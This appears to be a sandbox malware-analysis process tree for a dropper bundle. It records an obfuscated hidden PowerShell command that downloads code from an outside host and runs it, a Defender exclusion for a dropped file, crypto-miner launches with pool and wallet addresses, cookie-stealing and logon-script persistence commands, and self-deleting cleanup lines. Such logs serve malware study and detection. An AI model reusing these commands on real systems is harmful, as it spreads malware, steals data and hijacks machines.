        "C:\Users\Admin\AppData\Local\Temp\is-N5QSN.tmp\setups.tmp" /SL5="$802BC,635399,250368,C:\Users\Admin\AppData\Local\Temp\RBHOF1H54J\setups.exe" ll
        18⤵
        
        PID:8872
        
        C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\22.exe
        
        "C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\22.exe"
        11⤵
        
        PID:4704
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Program Files\javcse\install.vbs"
        12⤵
        
        PID:2832
        
        C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" "C:\Program Files\javcse\install.dll",install
        13⤵
        
        PID:3392
        
        C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\HookSetp.exe
        
        "C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\HookSetp.exe"
        11⤵
        
        PID:648
        
        C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\Three.exe
        
        "C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\Three.exe"
        11⤵
        
        PID:5704
        
        C:\Users\Admin\AppData\Local\Temp\0LDIZ0RWYI\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\0LDIZ0RWYI\multitimer.exe" 0 306065bb10421b26.04333812 0 103
        12⤵
        
        PID:2600
        
        C:\Users\Admin\AppData\Local\Temp\0LDIZ0RWYI\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\0LDIZ0RWYI\multitimer.exe" 1 3.1617432495.60680faf7e532 103
        13⤵
        
        PID:5284
        
        C:\Users\Admin\AppData\Local\Temp\0LDIZ0RWYI\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\0LDIZ0RWYI\multitimer.exe" 2 3.1617432495.60680faf7e532
        14⤵
        
        PID:4420
        
        C:\Users\Admin\AppData\Local\Temp\0op13rmy10g\app.exe
        
        "C:\Users\Admin\AppData\Local\Temp\0op13rmy10g\app.exe" /8-23
        15⤵
        
        PID:7136
        
        C:\Users\Admin\AppData\Local\Temp\hq1b3baiw22\vpn.exe
        
        "C:\Users\Admin\AppData\Local\Temp\hq1b3baiw22\vpn.exe" /silent /subid=482
        15⤵
        
        PID:5460
        
        C:\Users\Admin\AppData\Local\Temp\is-7LB7K.tmp\vpn.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-7LB7K.tmp\vpn.tmp" /SL5="$6046A,15170975,270336,C:\Users\Admin\AppData\Local\Temp\hq1b3baiw22\vpn.exe" /silent /subid=482
        16⤵
        
        PID:5392
        
        C:\Users\Admin\AppData\Local\Temp\wuobpdm2kvq\vict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\wuobpdm2kvq\vict.exe" /VERYSILENT /id=535
        15⤵
        
        PID:7156
        
        C:\Users\Admin\AppData\Local\Temp\is-USGL0.tmp\vict.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-USGL0.tmp\vict.tmp" /SL5="$502F2,870426,780800,C:\Users\Admin\AppData\Local\Temp\wuobpdm2kvq\vict.exe" /VERYSILENT /id=535
        16⤵
        
        PID:2212
        
        C:\Users\Admin\AppData\Local\Temp\is-9EAEF.tmp\win1host.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-9EAEF.tmp\win1host.exe" 535
        17⤵
        
        PID:6856
        
        C:\Users\Admin\AppData\Local\Temp\v01fwumddr4\Setup3310.exe
        
        "C:\Users\Admin\AppData\Local\Temp\v01fwumddr4\Setup3310.exe" /Verysilent /subid=577
        15⤵
        
        PID:7148
        
        C:\Users\Admin\AppData\Local\Temp\511zpfnxt1g\cpyrix.exe
        
        "C:\Users\Admin\AppData\Local\Temp\511zpfnxt1g\cpyrix.exe" /VERYSILENT
        15⤵
        
        PID:7116
        
        C:\Users\Admin\AppData\Roaming\1.exe
        
        C:\Users\Admin\AppData\Roaming\1.exe
        16⤵
        
        PID:4436
        
        C:\Users\Admin\AppData\Local\Temp\4e80912a-c9a2-4d9c-a221-a6fab1e8bdcd\AdvancedRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\4e80912a-c9a2-4d9c-a221-a6fab1e8bdcd\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\4e80912a-c9a2-4d9c-a221-a6fab1e8bdcd\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
        17⤵
        
        PID:5764
        
        C:\Users\Admin\AppData\Local\Temp\4e80912a-c9a2-4d9c-a221-a6fab1e8bdcd\AdvancedRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\4e80912a-c9a2-4d9c-a221-a6fab1e8bdcd\AdvancedRun.exe" /SpecialRun 4101d8 5764
        18⤵
        
        PID:4592
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\1.exe" -Force
        17⤵
        
        PID:7624
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c timeout 1
        17⤵
        
        PID:7692
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout 1
        18⤵
        Delays execution with timeout.exe
        
        PID:7360
        
        C:\Users\Admin\AppData\Roaming\1.exe
        
        "C:\Users\Admin\AppData\Roaming\1.exe"
        17⤵
        
        PID:8156
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4436 -s 1980
        17⤵
        Program crash
        
        PID:4804
        
        C:\Users\Admin\AppData\Roaming\2.exe
        
        C:\Users\Admin\AppData\Roaming\2.exe
        16⤵
        
        PID:5104
        
        C:\Users\Admin\AppData\Roaming\2.exe
        
        "{path}"
        17⤵
        
        PID:1968
        
        C:\Users\Admin\AppData\Local\Temp\b3ank5dqv2d\b5farklrqxa.exe
        
        "C:\Users\Admin\AppData\Local\Temp\b3ank5dqv2d\b5farklrqxa.exe" /ustwo INSTALL
        15⤵
        
        PID:7104
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im "b5farklrqxa.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\b3ank5dqv2d\b5farklrqxa.exe" & exit
        16⤵
        
        PID:6292
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im "b5farklrqxa.exe" /f
        17⤵
        Kills process with taskkill
        
        PID:2192
        
        C:\Users\Admin\AppData\Local\Temp\VO3WK45PN9\setups.exe
        
        "C:\Users\Admin\AppData\Local\Temp\VO3WK45PN9\setups.exe" ll
        12⤵
        
        PID:3128
        
        C:\Users\Admin\AppData\Local\Temp\is-77T48.tmp\setups.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-77T48.tmp\setups.tmp" /SL5="$20266,635399,250368,C:\Users\Admin\AppData\Local\Temp\VO3WK45PN9\setups.exe" ll
        13⤵
        
        PID:4900
        
        C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\guihuali-game.exe
        
        "C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\guihuali-game.exe"
        11⤵
        
        PID:4524
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"
        12⤵
        
        PID:5472
        
        C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install
        13⤵
        
        PID:6004
        
        C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\RunWW.exe
        
        "C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\RunWW.exe"
        11⤵
        
        PID:2448
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2448 -s 948
        12⤵
        Program crash
        
        PID:7776
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2448 -s 952
        12⤵
        Program crash
        
        PID:8764
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2448 -s 1084
        12⤵
        Program crash
        
        PID:6984
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2448 -s 1060
        12⤵
        Program crash
        
        PID:6880
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2448 -s 1008
        12⤵
        Program crash
        
        PID:6944
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2448 -s 1068
        12⤵
        Program crash
        
        PID:5036
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2448 -s 1204
        12⤵
        Program crash
        
        PID:7800
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2448 -s 1492
        12⤵
        Program crash
        
        PID:4028
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2448 -s 1628
        12⤵
        Program crash
        
        PID:5432
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2448 -s 1588
        12⤵
        Program crash
        
        PID:9224
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2448 -s 1684
        12⤵
        Program crash
        
        PID:9872
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2448 -s 1724
        12⤵
        Program crash
        
        PID:9532
        
        C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\J1bOtx55AJEQ.exe
        
        "C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\J1bOtx55AJEQ.exe"
        11⤵
        
        PID:5788
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
        12⤵
        
        PID:4976
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
        12⤵
        
        PID:4528
        
        C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lilalmix.exe
        
        "C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lilalmix.exe"
        11⤵
        
        PID:1632
        
        C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lilalmix.exe
        
        "C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lilalmix.exe"
        12⤵
        
        PID:5072
        
        C:\Users\Admin\Videos\lilal.exe
        
        "C:\Users\Admin\Videos\lilal.exe"
        13⤵
        
        PID:9204
        
        C:\Windows\SysWOW64\at.exe
        
        "C:\Windows\System32\at.exe"
        14⤵
        
        PID:8896
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\cmd.exe < Dir.mui
        14⤵
        
        PID:8496
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\System32\cmd.exe
        15⤵
        
        PID:7176
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Remove.bat" 5072 C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lilalmix.exe"
        13⤵
        
        PID:9064
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /PID 5072
        14⤵
        Kills process with taskkill
        
        PID:9036
        
        C:\Windows\SysWOW64\choice.exe
        
        choice /C Y /N /D Y /T 3
        14⤵
        
        PID:8592
        
        C:\Users\Admin\AppData\Local\Temp\kw4hywyvcq5\cpyrix.exe
        
        "C:\Users\Admin\AppData\Local\Temp\kw4hywyvcq5\cpyrix.exe" /VERYSILENT
        8⤵
        
        PID:4516
        
        C:\Users\Admin\AppData\Roaming\1.exe
        
        C:\Users\Admin\AppData\Roaming\1.exe
        9⤵
        
        PID:580
        
        C:\Users\Admin\AppData\Local\Temp\7b5ba9f8-a4e0-4148-90cb-4e8311b73095\AdvancedRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7b5ba9f8-a4e0-4148-90cb-4e8311b73095\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\7b5ba9f8-a4e0-4148-90cb-4e8311b73095\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
        10⤵
        
        PID:5744
        
        C:\Users\Admin\AppData\Local\Temp\7b5ba9f8-a4e0-4148-90cb-4e8311b73095\AdvancedRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7b5ba9f8-a4e0-4148-90cb-4e8311b73095\AdvancedRun.exe" /SpecialRun 4101d8 5744
        11⤵
        
        PID:5188
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\1.exe" -Force
        10⤵
        
        PID:7456
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c timeout 1
        10⤵
        
        PID:7532
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout 1
        11⤵
        Delays execution with timeout.exe
        
        PID:7660
        
        C:\Users\Admin\AppData\Roaming\1.exe
        
        "C:\Users\Admin\AppData\Roaming\1.exe"
        10⤵
        
        PID:4728
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 580 -s 1584
        10⤵
        Program crash
        
        PID:4336
        
        C:\Users\Admin\AppData\Roaming\2.exe
        
        C:\Users\Admin\AppData\Roaming\2.exe
        9⤵
        
        PID:6884
        
        C:\Users\Admin\AppData\Roaming\2.exe
        
        "{path}"
        10⤵
        
        PID:5156
        
        C:\Users\Admin\AppData\Roaming\2.exe
        
        "{path}"
        10⤵
        
        PID:7480
        
        C:\Users\Admin\AppData\Local\Temp\ks4mlip2fco\yswjnvbxh0v.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ks4mlip2fco\yswjnvbxh0v.exe" /ustwo INSTALL
        8⤵
        
        PID:4668
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im "yswjnvbxh0v.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\ks4mlip2fco\yswjnvbxh0v.exe" & exit
        9⤵
        
        PID:6124
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im "yswjnvbxh0v.exe" /f
        10⤵
        Kills process with taskkill
        
        PID:4544
        
        C:\Users\Admin\AppData\Local\Temp\4lrro3vtmwe\0dqushsuims.exe
        
        "C:\Users\Admin\AppData\Local\Temp\4lrro3vtmwe\0dqushsuims.exe" /VERYSILENT
        8⤵
        
        PID:5124
        
        C:\Users\Admin\AppData\Local\Temp\is-B95NR.tmp\0dqushsuims.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-B95NR.tmp\0dqushsuims.tmp" /SL5="$40304,2592217,780800,C:\Users\Admin\AppData\Local\Temp\4lrro3vtmwe\0dqushsuims.exe" /VERYSILENT
        9⤵
        
        PID:5300
        
        C:\Users\Admin\AppData\Local\Temp\is-KAL5D.tmp\winlthsth.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-KAL5D.tmp\winlthsth.exe"
        10⤵
        
        PID:6104
        
        C:\Users\Admin\AppData\Local\Temp\yJyNkTwWr.exe
        
        "C:\Users\Admin\AppData\Local\Temp\yJyNkTwWr.exe"
        11⤵
        
        PID:3540
        
        C:\Users\Admin\AppData\Local\Temp\yJyNkTwWr.exe
        
        "C:\Users\Admin\AppData\Local\Temp\yJyNkTwWr.exe"
        12⤵
        
        PID:6228
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c start /B powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"
        11⤵
        
        PID:6244
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"
        12⤵
        
        PID:4680
        
        C:\Users\Admin\AppData\Local\Temp\xouipvbiapf\app.exe
        
        "C:\Users\Admin\AppData\Local\Temp\xouipvbiapf\app.exe" /8-23
        8⤵
        
        PID:5168
        
        C:\Users\Admin\AppData\Local\Temp\o2d5owoxd55\zzj1chlerxz.exe
        
        "C:\Users\Admin\AppData\Local\Temp\o2d5owoxd55\zzj1chlerxz.exe"
        8⤵
        
        PID:5148
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\o2d5owoxd55\zzj1chlerxz.exe"
        9⤵
        
        PID:4252
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping 1.1.1.1 -n 1 -w 3000
        10⤵
        Runs ping.exe
        
        PID:4372
        
        C:\Users\Admin\AppData\Local\Temp\3gakcxq0fzr\IBInstaller_97039.exe
        
        "C:\Users\Admin\AppData\Local\Temp\3gakcxq0fzr\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq
        8⤵
        
        PID:5260
        
        C:\Users\Admin\AppData\Local\Temp\is-PSEAR.tmp\IBInstaller_97039.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-PSEAR.tmp\IBInstaller_97039.tmp" /SL5="$30278,14574851,721408,C:\Users\Admin\AppData\Local\Temp\3gakcxq0fzr\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq
        9⤵
        
        PID:5420
        
        C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-OE5BV.tmp\{app}\microsoft.cab -F:* %ProgramData%
        10⤵
        
        PID:5676
        
        C:\Windows\SysWOW64\expand.exe
        
        expand C:\Users\Admin\AppData\Local\Temp\is-OE5BV.tmp\{app}\microsoft.cab -F:* C:\ProgramData
        11⤵
        
        PID:5956
        
        C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /c start http://egypthistoricart.online/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=97039^&param=
        10⤵
        
        PID:8288
        
        C:\ProgramData\regid.1993-06.com.microsoft\client32.exe
        
        "C:\ProgramData\regid.1993-06.com.microsoft\client32.exe"
        10⤵
        
        PID:1488
        
        C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "%ProgramData%\regid.1993-06.com.microsoft\client32.exe" /f
        10⤵
        
        PID:4632
        
        C:\Users\Admin\AppData\Local\Temp\is-OE5BV.tmp\{app}\chrome_proxy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-OE5BV.tmp\{app}\chrome_proxy.exe"
        10⤵
        
        PID:9616
        
        C:\Users\Admin\AppData\Local\Temp\olt5c3pruu0\vpn.exe
        
        "C:\Users\Admin\AppData\Local\Temp\olt5c3pruu0\vpn.exe" /silent /subid=482
        8⤵
        
        PID:5336
        
        C:\Users\Admin\AppData\Local\Temp\is-G8QTV.tmp\vpn.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-G8QTV.tmp\vpn.tmp" /SL5="$20334,15170975,270336,C:\Users\Admin\AppData\Local\Temp\olt5c3pruu0\vpn.exe" /silent /subid=482
        9⤵
        
        PID:5480
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "
        10⤵
        
        PID:4132
        
        C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
        
        tapinstall.exe remove tap0901
        11⤵
        
        PID:5508
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "
        10⤵
        
        PID:5976
        
        C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
        
        tapinstall.exe install OemVista.inf tap0901
        11⤵
        
        PID:6528
        
        C:\Program Files (x86)\MaskVPN\mask_svc.exe
        
        "C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall
        10⤵
        
        PID:3320
        
        C:\Program Files (x86)\MaskVPN\mask_svc.exe
        
        "C:\Program Files (x86)\MaskVPN\mask_svc.exe" install
        10⤵
        
        PID:10152
        
        C:\Users\Admin\AppData\Local\Temp\gby1qcgnbbl\f4k2he2wnhc.exe
        
        "C:\Users\Admin\AppData\Local\Temp\gby1qcgnbbl\f4k2he2wnhc.exe" /quiet SILENT=1 AF=756
        8⤵
        
        PID:5356
        
        C:\Windows\SysWOW64\msiexec.exe
        
        "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=756 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\gby1qcgnbbl\f4k2he2wnhc.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\gby1qcgnbbl\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1617173330 /quiet SILENT=1 AF=756 " AF="756" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912"
        9⤵
        
        PID:192
        
        C:\Users\Admin\AppData\Local\Temp\tab550kvzxg\vict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\tab550kvzxg\vict.exe" /VERYSILENT /id=535
        8⤵
        
        PID:4188
        
        C:\Users\Admin\AppData\Local\Temp\wgbsixipou5\KiffApp1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\wgbsixipou5\KiffApp1.exe"
        8⤵
        
        PID:4784
    - - C:\Users\Admin\AppData\Local\Temp\Z9GEQW6V3H\setups.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Z9GEQW6V3H\setups.exe" ll
        5⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        
        PID:904
      - C:\Users\Admin\AppData\Local\Temp\is-UD089.tmp\setups.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-UD089.tmp\setups.tmp" /SL5="$4010E,635399,250368,C:\Users\Admin\AppData\Local\Temp\Z9GEQW6V3H\setups.exe" ll
        6⤵
        Executes dropped EXE
        Checks computer location settings
        Loads dropped DLL
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        
        PID:2704
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe"
      4⤵
      Executes dropped EXE
      Modifies system certificate store
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2236
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c taskkill /f /im chrome.exe
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:3668
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im chrome.exe
        6⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:3672
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX2\Full Program Features.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX2\Full Program Features.exe"
      4⤵
      Executes dropped EXE
      Drops file in Program Files directory
      Suspicious use of WriteProcessMemory
      PID:4496
    - - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4576
      - C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install
        6⤵
        
        PID:4752
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"
      4⤵
      Executes dropped EXE
      PID:4612
    - - C:\Users\Admin\AppData\Roaming\EA08.tmp.exe
        
        "C:\Users\Admin\AppData\Roaming\EA08.tmp.exe"
        5⤵
        
        PID:4168
      - C:\Users\Admin\AppData\Roaming\EA08.tmp.exe
        
        "C:\Users\Admin\AppData\Roaming\EA08.tmp.exe"
        6⤵
        
        PID:3892
    - - C:\Users\Admin\AppData\Roaming\EB8F.tmp.exe
        
        "C:\Users\Admin\AppData\Roaming\EB8F.tmp.exe"
        5⤵
        
        PID:732
      - C:\Windows\system32\msiexec.exe
        
        -P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.work@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 99999
        6⤵
        
        PID:1888
      - C:\Windows\system32\msiexec.exe
        
        -o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8 --cpu-max-threads-hint 50 -r 9999
        6⤵
        
        PID:4272
    - - C:\Users\Admin\AppData\Roaming\EC1D.tmp.exe
        
        "C:\Users\Admin\AppData\Roaming\EC1D.tmp.exe"
        5⤵
        
        PID:4980
      - C:\Windows\SysWOW64\cmd.exe
        
        /c timeout /t 3 & del /f /q C:\Users\Admin\AppData\Roaming\EC1D.tmp.exe
        6⤵
        
        PID:6516
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 3
        7⤵
        Delays execution with timeout.exe
        
        PID:6976
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"
        5⤵
        
        PID:5688
      - C:\Windows\SysWOW64\PING.EXE
        
        ping 127.0.0.1
        6⤵
        Runs ping.exe
        
        PID:6024
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe"
      4⤵
      PID:5752
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX2\BTRSetp.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX2\BTRSetp.exe"
      4⤵
      PID:8664
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX2\gcttt.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX2\gcttt.exe"
      4⤵
      PID:4180
    - - C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        5⤵
        
        PID:4708
    - - C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        5⤵
        
        PID:7976

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
- Executes dropped EXE
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:956

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
- Modifies Internet Explorer settings
PID:2772

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4348

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:4412

